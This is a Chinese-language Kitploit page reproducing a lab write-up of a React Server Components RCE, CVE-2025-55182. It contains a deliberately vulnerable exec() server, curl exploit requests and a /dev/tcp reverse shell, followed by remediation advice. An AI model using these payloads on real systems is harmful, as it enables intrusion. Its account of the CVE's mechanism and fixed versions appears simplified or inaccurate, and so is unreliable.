Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182-analysis — 针对 CVE-2025-55182 (React) 的安全研究与漏洞利用分析 — CVSS + OWASP Top 10 映射 | Kitploit
工具/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

针对 CVE-2025-55182 (React) 的安全研究与漏洞利用分析 — CVSS + OWASP Top 10 映射

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
14个月前尚未审核
分享

CVE-2025-55182 — React 服务端组件 RCE 分析

Web 应用程序漏洞分析 · M2 网络安全 · 2025 作者:Niane Mohamed · LinkedIn

React 服务端组件中一个**严重(CVSS 10.0)**不安全反序列化漏洞的端到端利用链,涵盖从侦察到未授权远程代码执行的完整流程,并附带完整的修复路线图。


⚠️ 道德免责声明

本研究针对一个刻意构建为易受攻击的实验室应用程序,用于演示该 CVE。所有测试均在隔离的虚拟网络中进行,与生产系统、真实用户数据或第三方服务无任何连接。

  • 请勿对您不拥有或未获得明确书面授权测试的系统运行这些技术。
  • 请勿将易受攻击的应用程序部署到任何可访问互联网的网络。
  • 适用负责任披露原则——始终通过协调渠道报告发现。

目录

  1. 漏洞摘要
  2. 受影响版本
  3. 实验室环境
  4. 利用过程详解
  5. 影响评估
  6. 修复措施
  7. 展示的技能

漏洞摘要

字段值
CVECVE-2025-55182
类型不安全反序列化 → 远程代码执行
CVSS v3.110.0(严重) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
所需身份验证无
所需用户交互无
攻击向量网络(远程)
组件React 服务端组件(RSC)运行时

漏洞原理

React 服务端组件引入了一种新的序列化格式,用于将服务端渲染的组件流式传输到客户端。在受影响的版本中,RSC 端点接受包含 cmd 字段的 JSON 负载,该字段未经清理即被传递给 child_process.exec(),作为服务端渲染评估的一部分。

攻击者可以发送一个精心构造的 POST 请求,该请求:

  1. 作为合法的 RSC 负载被接受(无需身份验证,无需 CSRF)
  2. 在“渲染”期间触发服务端代码执行
  3. 以 Node.js 进程的权限运行(在容器中通常为 root)

受影响版本

组件受影响范围修复版本
react19.0.0 → 19.2.019.3.0+
react-server-dom-webpack

实验室环境

目标应用程序

一个极简的 Express + RSC 服务器,暴露 /rsc 端点,不安全地执行来自传入负载的命令——以受控方式复现真实 CVE 的漏洞模式:

root@kitploit:~
// server.js — simplified, lab-only
const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.json({ limit: '2mb' }));

app.post('/rsc', (req, res) => {
  const payload = req.body?.payload;
  if (typeof payload?.cmd === 'string') {
    // VULNERABLE: executes attacker-controlled string
    exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
      if (err) return res.status(500).json({ error: String(err), stderr });
      return res.json({ ok: true, out: stdout });
    });
  }
});

app.listen(3000);

利用过程详解

第一阶段 — 侦察

root@kitploit:~
# Port discovery
nmap 192.168.159.131
# → 3000/tcp open  ppp  (Node.js RSC server)

# Service verification
curl -v http://192.168.159.131:3000/
# → HTTP/1.1 200 OK
# → X-Powered-By: Express
# → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."

X-Powered-By: Express 响应头和非常规的 3000 端口提供了强有力的指纹信息,表明这是一个 Node.js 应用程序——与 RSC 部署情况相符。

第二阶段 — 通过无害命令确认

在尝试任何破坏性操作之前,先用一个无害命令验证漏洞:

root@kitploit:~
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "id" } }'

# Response:
# {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}

✅ 已确认: 以 root 身份进行未授权 RCE。服务器以无限制权限运行。

第三阶段 — 反弹 Shell

从单命令执行升级为完整交互式 Shell:

root@kitploit:~
# Listener on attacker machine
nc -lvnp 4444

# Payload delivery
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'

监听器收到连接:

root@kitploit:~
connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
root@ns1:~/vulnerable_rsc_app# id
uid=0(root) gid=0(root) groups=0(root)

第四阶段 — 后渗透利用潜力(已演示,未实际执行)

在目标上获得 root 权限后,攻击者可以轻松地:

  • 读取 /etc/shadow、SSH 密钥、应用程序机密、.env 文件
  • 安装持久化后门(cron 任务、systemd 服务、植入 SSH 密钥)
  • 利用发现的凭据进行横向移动
  • 部署加密货币挖矿程序或勒索软件
  • 修改 Node.js 应用程序以静默捕获用户数据

影响评估

业务影响(虚构目标场景)

威胁行为者画像

这种攻击的复杂度极低——无需身份验证、无需用户交互、仅需单个 HTTP 请求——因此对以下群体具有吸引力:

  • 机会主义扫描者(自动扫描该 CVE 的僵尸网络)
  • 初始访问代理,向勒索软件团伙出售立足点
  • 国家行为体,针对使用 React 服务端渲染的组织

修复措施

立即执行(24 小时内)

  1. 将 React 升级到 19.3.0+ — 已修复版本

    root@kitploit:~
    npm update react react-server-dom-webpack react-server-dom-esm
    
  2. 临时 WAF 规则(如升级延迟):

    root@kitploit:~
    Block POST requests to /rsc with JSON body containing "cmd" field
    
  3. 紧急事件响应:

    • 审查过去 90 天的服务器访问日志
    • 查找异常的 /rsc POST 流量
    • 轮换服务器可访问的所有机密
    • 在修复前对受影响系统进行快照以用于取证

短期(两周内)

长期(一个季度内)

OWASP Top 10 映射

OWASP 类别相关性
A03:2021 — 注入通过反序列化输入实现命令注入
A08:2021 — 软件和数据完整性失效未进行完整性验证的不安全反序列化
A06:2021 — 易受攻击和过时的组件

展示的技能

  • 漏洞分析: CVE 分类、CVSS 评分、可利用性评估
  • 侦察: Nmap 扫描、服务指纹识别、横幅抓取
  • 漏洞利用: 使用 curl 进行 HTTP 操作、反弹 Shell 构造、负载定制
  • 代理工具: OWASP ZAP 拦截、请求/响应修改
  • 业务沟通: 将技术发现转化为面向管理层的风险语言
  • 修复设计: 覆盖立即/短期/长期时间跨度的分层控制措施
  • 框架: OWASP Top 10、CVSS v3.1、CWE 分类法、GDPR/DSGVO 影响评估

参考资料

  • CVE-2025-55182 — NVD 条目 (占位符 — 引用前请核实)
  • React 服务端组件文档
  • OWASP Top 10 — 2021
  • CVSS v3.1 规范
  • CWE-502 — 不可信数据反序列化

许可证

MIT 许可证 — 参见 LICENSE

出于教育和防御性研究目的发布。请参见文首的道德免责声明。


联系方式

Niane Mohamed — 网络与安全工程师 📍 毛里塔尼亚,努瓦克肖特 → 正在德国寻求机会 🇩🇪 📧 [email protected] · 🔗 LinkedIn

下载工具
19.0.0 → 19.2.0
19.3.0+
react-server-dom-esm19.0.0 → 19.2.019.3.0+
角色操作系统工具
攻击者Kali Linux(最新版)nmap, curl, netcat, OWASP ZAP, Firefox
目标Ubuntu 22.04.4Node.js 18, Express, React 19.0 RSC
网络VMware VMnet 仅主机模式无互联网出口
维度影响说明
机密性严重可完全读取服务器上的所有数据
完整性严重能够修改应用程序代码和用户数据
可用性高攻击者可终止服务或将其劫持以勒索赎金
监管严重违反 GDPR/DSGVO,须在 72 小时内强制披露 · 可能面临全球营收 4% 的罚款
声誉严重公开披露的 CVE 映射漏洞破坏客户信任
财务高应急响应成本、监管罚款、潜在的集体诉讼
控制措施目的
如未使用则禁用 RSC减少攻击面——许多应用不需要服务端组件
严格的输入验证拒绝任何包含可执行键的反序列化对象
非 root 容器用户限制 RCE 再次发生时的爆炸半径
只读根文件系统防止持久化和恶意二进制文件落地
出站流量过滤阻止应用服务器到任意 IP 的出站流量
控制措施目的
具备行为分析的 WAF检测超出签名规则的异常 POST 负载
运行时应用自我保护(RASP)在运行时阻止 exec() 等危险函数调用
CI/CD 中的软件成分分析(SCA)在部署前捕获易受攻击的依赖(pip-audit、npm audit、Trivy)
渗透测试节奏每年一次 + 重大版本发布后
漏洞赏金计划激励白帽在攻击者发现之前披露漏洞
披露后仍使用 React 19.0-19.2
A05:2021 — 安全配置错误以 root 身份运行 Node.js,无输入验证